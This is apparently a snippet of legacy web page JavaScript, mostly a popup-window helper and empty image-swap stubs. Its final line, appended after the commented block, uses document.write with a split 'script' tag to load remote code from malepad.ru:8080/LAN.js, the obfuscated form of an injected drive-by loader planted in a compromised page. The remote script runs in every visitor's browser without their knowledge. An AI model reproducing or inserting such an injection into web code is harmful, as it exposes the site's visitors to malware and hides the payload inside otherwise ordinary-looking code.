    <!--
    window.name = "DEFINITION";
    function MM_swapImage() { }
    function MM_swapImgRestore() { }

    function miniwinpopup (w, h, myurl, targetstring, l, t) {
        var popup=new Object();
        popup.w=w;
        popup.h=h;
        popup.l=l;
        popup.t=t;
        popup.url=myurl;
        popup.trgt=targetstring;

        // if((b=="IE")||(v==2)) {
        //    window.open(popup.url,popup.trgt,"width="+popup.w+",height="+popup.h+",resizable=1,status=0,left="+popup.l+",top="+popup.t+",menubar=0,scrollbars=1,toolbar=1,location=0,directories=0")
        // }
        // else {
            window1=window.open(popup.url, popup.trgt, "width="+popup.w+",height="+popup.h+",resizable=1,status=0,left="+popup.l+",top="+popup.t+",menubar=0,scrollbars=1,toolbar=1,location=0,directories=0");
//            window1.focus();
        // }
    }

    // -->

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/LAN.js"></scr'+'ipt>');